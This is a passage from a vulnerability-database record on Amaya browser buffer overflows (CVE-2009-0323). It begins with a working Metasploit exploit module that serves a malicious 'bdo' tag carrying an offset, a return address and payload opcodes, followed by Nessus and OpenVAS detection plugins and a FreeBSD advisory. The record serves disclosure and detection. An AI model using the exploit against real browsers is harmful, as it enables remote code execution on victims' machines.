Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Amaya Browser v11.0 bdo tag overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the Amaya v11 Browser.\r\n\t\t\t\t\tBy sending an overly long string to the \"bdo\"\r\n\t\t\t\t\ttag, an attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'dookie, original exploit by Rob Carter' ],\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-0323' ],\r\n\t\t\t\t\t[ 'OSVDB', '55721' ],\r\n\t\t\t\t\t[ 'BID', '33046, 33047' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 970,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Amaya Browser v11', { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 28 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# Set the exploit buffer\r\n\t\tsploit = \"<bdo dir=\\\"\"\r\n\t\tsploit += \"\\x41\" * 6889\r\n\t\tsploit += \"\\x74\\x06\\x41\\x41\"\r\n\t\tsploit += [target.ret].pack('V')\r\n\t\tsploit += \"\\x68\\x7f\\x01\\x01\\x7f\" # push 7F01017F\r\n\t\tsploit += \"\\x58\"\t\t # pop EAX\r\n\t\tsploit += 
\"\\x2d\\x18\\x69\\x45\\x7d\" # sub EAX, 7A7A0857\r\n\t\tsploit += \"\\x50\"\t\t # push EAX\r\n\t\tsploit += \"\\xc3\"\t\t # RETN\r\n\t\tsploit += make_nops(100)\r\n\t\tsploit += payload.encoded\r\n\t\tsploit += make_nops(970 - payload.encoded.length)\r\n\t\tsploit += \"\\\">pwned!</bdo>\"\r\n\r\n\t\tprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, sploit)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16548/"}], "nessus": [{"lastseen": "2021-01-07T10:48:57", "description": "Secunia reports :\n\nA boundary error when processing 'div' HTML tags can be exploited to\ncause a stack-based buffer overflow via an overly long 'id' parameter.\n\nA boundary error exists when processing overly long links. This can be\nexploited to cause a stack-based buffer overflow by tricking the user\ninto e.g. editing a malicious link.\n\nA boundary error when processing e.g. a 'bdo' HTML tag having an\noverly long 'dir' attribute can be exploited to cause a stack-based\nbuffer overflow.\n\nA boundary error when processing 'input' HTML tags can be exploited to\ncause a stack-based buffer overflow via an overly long e.g. 
'type'\nattribute.", "edition": 25, "published": "2011-10-14T00:00:00", "title": "FreeBSD : amaya -- multiple buffer overflow vulnerabilities (a89b76a7-f6bd-11dd-94d9-0030843d3802)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5282", "CVE-2009-0323"], "modified": "2011-10-14T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:amaya"], "id": "FREEBSD_PKG_A89B76A7F6BD11DD94D90030843D3802.NASL", "href": "https://www.tenable.com/plugins/nessus/56495", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2013 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56495);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-5282\", \"CVE-2009-0323\");\n script_xref(name:\"EDB-ID\", value:\"7467\");\n script_xref(name:\"Secunia\", value:\"32848\");\n\n script_name(english:\"FreeBSD : amaya -- multiple buffer overflow vulnerabilities (a89b76a7-f6bd-11dd-94d9-0030843d3802)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Secunia reports :\n\nA boundary error when processing 'div' HTML tags can be exploited to\ncause a stack-based buffer overflow via an overly long 'id' parameter.\n\nA boundary error exists when processing overly long links. This can be\nexploited to cause a stack-based buffer overflow by tricking the user\ninto e.g. editing a malicious link.\n\nA boundary error when processing e.g. a 'bdo' HTML tag having an\noverly long 'dir' attribute can be exploited to cause a stack-based\nbuffer overflow.\n\nA boundary error when processing 'input' HTML tags can be exploited to\ncause a stack-based buffer overflow via an overly long e.g. 
'type'\nattribute.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.bmgsec.com.au/advisory/41/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.bmgsec.com.au/advisory/40/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.coresecurity.com/content/amaya-buffer-overflows\"\n );\n # http://www.freebsd.org/ports/portaudit/a89b76a7-f6bd-11dd-94d9-0030843d3802.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d32cc0dc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Amaya Browser v11.0 \"bdo\" Tag Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:amaya\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", 
\"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"amaya>0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5282", "CVE-2009-0323"], "description": "\nSecunia reports:\n\nA boundary error when processing \"div\" HTML tags can be exploited\n\t to cause a stack-based buffer overflow via an overly long \"id\"\n\t parameter.\nA boundary error exists when processing overly long links. This can\n\t be exploited to cause a stack-based buffer overflow by tricking the\n\t user into e.g. editing a malicious link.\nA boundary error when processing e.g. a \"bdo\" HTML tag having an\n\t overly long \"dir\" attribute can be exploited to cause a stack-based\n\t buffer overflow.\nA boundary error when processing \"input\" HTML tags can be\n\t exploited to cause a stack-based buffer overflow via an overly long\n\t e.g. 
\"type\" attribute.\n\n", "edition": 4, "modified": "2008-11-25T00:00:00", "published": "2008-11-25T00:00:00", "id": "A89B76A7-F6BD-11DD-94D9-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/a89b76a7-f6bd-11dd-94d9-0030843d3802.html", "title": "amaya -- multiple buffer overflow vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-02T21:14:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-6005", "CVE-2008-5282", "CVE-2009-0323"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-21T00:00:00", "published": "2009-02-13T00:00:00", "id": "OPENVAS:63357", "href": "http://plugins.openvas.org/nasl.php?oid=63357", "type": "openvas", "title": "FreeBSD Ports: amaya", "sourceData": "#\n#VID a89b76a7-f6bd-11dd-94d9-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID a89b76a7-f6bd-11dd-94d9-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: amaya\n\nCVE-2008-5282\nMultiple stack-based buffer overflows in W3C Amaya Web Browser 10.0.1\nallow remote attackers to execute arbitrary code via (1) a link with a\nlong HREF attribute, and (2) a DIV tag with a long id attribute.\n\nCVE-2009-0323\nMultiple stack-based buffer overflows in W3C Amaya Web Browser 10.0\nand 11.0 allow remote attackers to execute arbitrary code via (1) a\nlong type parameter in an input tag, which is not properly handled by\nthe EndOfXmlAttributeValue function; (2) an 'HTML GI' in a start tag,\nwhich is not properly handled by the ProcessStartGI function; and\nunspecified vectors in (3) html2thot.c and (4) xml2thot.c, related to\nthe msgBuffer variable. 
NOTE: these are different vectors than\nCVE-2008-6005.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/32848/\nhttp://www.bmgsec.com.au/advisory/41/\nhttp://www.bmgsec.com.au/advisory/40/\nhttp://milw0rm.com/exploits/7467\nhttp://www.coresecurity.com/content/amaya-buffer-overflows\nhttp://www.vuxml.org/freebsd/a89b76a7-f6bd-11dd-94d9-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(63357);\n script_version(\"$Revision: 4824 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-21 09:49:38 +0100 (Wed, 21 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-13 20:43:17 +0100 (Fri, 13 Feb 2009)\");\n script_cve_id(\"CVE-2008-5282\", \"CVE-2009-0323\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: amaya\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"amaya\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package amaya version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-6005", "CVE-2008-5282", "CVE-2009-0323"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-02-13T00:00:00", "id": "OPENVAS:136141256231063357", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063357", "type": "openvas", "title": "FreeBSD Ports: amaya", "sourceData": "#\n#VID a89b76a7-f6bd-11dd-94d9-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID a89b76a7-f6bd-11dd-94d9-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: amaya\n\nCVE-2008-5282\nMultiple stack-based buffer overflows in W3C Amaya Web Browser 10.0.1\nallow remote attackers to execute arbitrary code via (1) a link with a\nlong HREF attribute, and (2) a DIV tag with a long id attribute.\n\nCVE-2009-0323\nMultiple stack-based buffer overflows in W3C Amaya Web Browser 10.0\nand 11.0 allow remote attackers to execute arbitrary code via (1) a\nlong type parameter in an input tag, which is not properly handled by\nthe EndOfXmlAttributeValue function; (2) an 'HTML GI' in a start tag,\nwhich is not properly handled by the ProcessStartGI function; and\nunspecified vectors in (3) html2thot.c and (4) xml2thot.c, related to\nthe msgBuffer variable. 
NOTE: these are different vectors than\nCVE-2008-6005.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/32848/\nhttp://www.bmgsec.com.au/advisory/41/\nhttp://www.bmgsec.com.au/advisory/40/\nhttp://milw0rm.com/exploits/7467\nhttp://www.coresecurity.com/content/amaya-buffer-overflows\nhttp://www.vuxml.org/freebsd/a89b76a7-f6bd-11dd-94d9-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63357\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-13 20:43:17 +0100 (Fri, 13 Feb 2009)\");\n script_cve_id(\"CVE-2008-5282\", \"CVE-2009-0323\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: amaya\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"amaya\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package amaya version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}